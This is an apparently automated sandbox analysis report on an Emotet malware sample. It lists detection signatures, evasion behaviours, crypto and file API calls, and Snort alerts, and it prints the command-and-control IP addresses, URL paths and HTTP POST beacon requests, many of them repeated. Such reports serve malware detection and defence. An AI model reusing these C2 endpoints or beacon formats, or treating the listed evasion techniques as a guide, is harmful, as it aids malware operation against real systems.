Analysis Report FsWcL0gpTv

Overview

General Information

Sample Name: FsWcL0gpTv (renamed file extension from none to exe)
Analysis ID: 317598
MD5: d1cef4c90a48a4788d9ce4208ee769cb
SHA1: 5c17f1665881c62c9cee7bded2df3c2ac557cd38
SHA256: eabe9e59682457968198f818f0d2d280d397a001d7fee58a2de6c9acc0d2651a

Most interesting Screenshot:

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: FsWcL0gpTv.exe Virustotal: Detection: 61% Perma Link
Source: FsWcL0gpTv.exe Metadefender: Detection: 45% Perma Link
Source: FsWcL0gpTv.exe ReversingLabs: Detection: 70%
Source: FsWcL0gpTv.exe Virustotal: Detection: 61% Perma Link
Source: FsWcL0gpTv.exe Metadefender: Detection: 45% Perma Link
Source: FsWcL0gpTv.exe ReversingLabs: Detection: 70%
Machine Learning detection for sample
Source: FsWcL0gpTv.exe Joe Sandbox ML: detected
Source: FsWcL0gpTv.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap, 3_2_02A72290
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 3_2_02A72650
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A71FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash, 3_2_02A71FB0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap, 3_2_02A72290
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 3_2_02A72650
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A71FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash, 3_2_02A71FB0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 3_2_02A738F0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49707 -> 102.182.145.130:80
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49723 -> 173.173.254.105:80
Source: Traffic Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49734 -> 64.207.182.168:8080
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49737 -> 51.89.199.141:8080
Source: Traffic Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49707 -> 102.182.145.130:80
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49723 -> 173.173.254.105:80
Source: Traffic Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49734 -> 64.207.182.168:8080
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49737 -> 51.89.199.141:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 64.207.182.168:8080
Source: global traffic TCP traffic: 192.168.2.5:49737 -> 51.89.199.141:8080
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 64.207.182.168:8080
Source: global traffic TCP traffic: 192.168.2.5:49737 -> 51.89.199.141:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 102.182.145.130 102.182.145.130
Source: Joe Sandbox View IP Address: 102.182.145.130 102.182.145.130
Source: Joe Sandbox View IP Address: 64.207.182.168 64.207.182.168
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AfrihostZA AfrihostZA
Source: Joe Sandbox View ASN Name: AfrihostZA AfrihostZA
Source: Joe Sandbox View ASN Name: GO-DADDY-COM-LLCUS GO-DADDY-COM-LLCUS
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 102.182.145.130:80
Source: global traffic TCP traffic: 192.168.2.5:49723 -> 173.173.254.105:80
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 102.182.145.130:80
Source: global traffic TCP traffic: 192.168.2.5:49723 -> 173.173.254.105:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------wo3M7HGlGf1KUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4580Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------wo3M7HGlGf1KUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4580Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW, 3_2_02A729B0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW, 3_2_02A729B0
Source: unknown HTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/X-
Source: WpPortingLibrary.exe, 00000003.00000003.361330882.000000000325E000.00000004.00000001.sdmp String found in binary or memory: http://173.173.254.105/LN19JoV6Jo34Ba/UOjzG3KqtwalQ/Gy4EZLufQaYY3rmRrq0/Su721nFGl8jnm9/v1RyG4lzB/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/
Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/.
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/T)
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/d(
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/O
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/l
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/ll
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000004.00000002.501376722.0000017996C00000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000004.00000002.503056387.0000017997060000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000009.00000002.304660388.00000189FAC13000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.304362631.00000189FAC63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000002.304715723.00000189FAC3A000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/X-
Source: WpPortingLibrary.exe, 00000003.00000003.361330882.000000000325E000.00000004.00000001.sdmp String found in binary or memory: http://173.173.254.105/LN19JoV6Jo34Ba/UOjzG3KqtwalQ/Gy4EZLufQaYY3rmRrq0/Su721nFGl8jnm9/v1RyG4lzB/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/
Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/.
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/T)
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/d(
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/O
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/l
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/ll
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000004.00000002.501376722.0000017996C00000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000004.00000002.503056387.0000017997060000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000009.00000002.304660388.00000189FAC13000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.304362631.00000189FAC63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
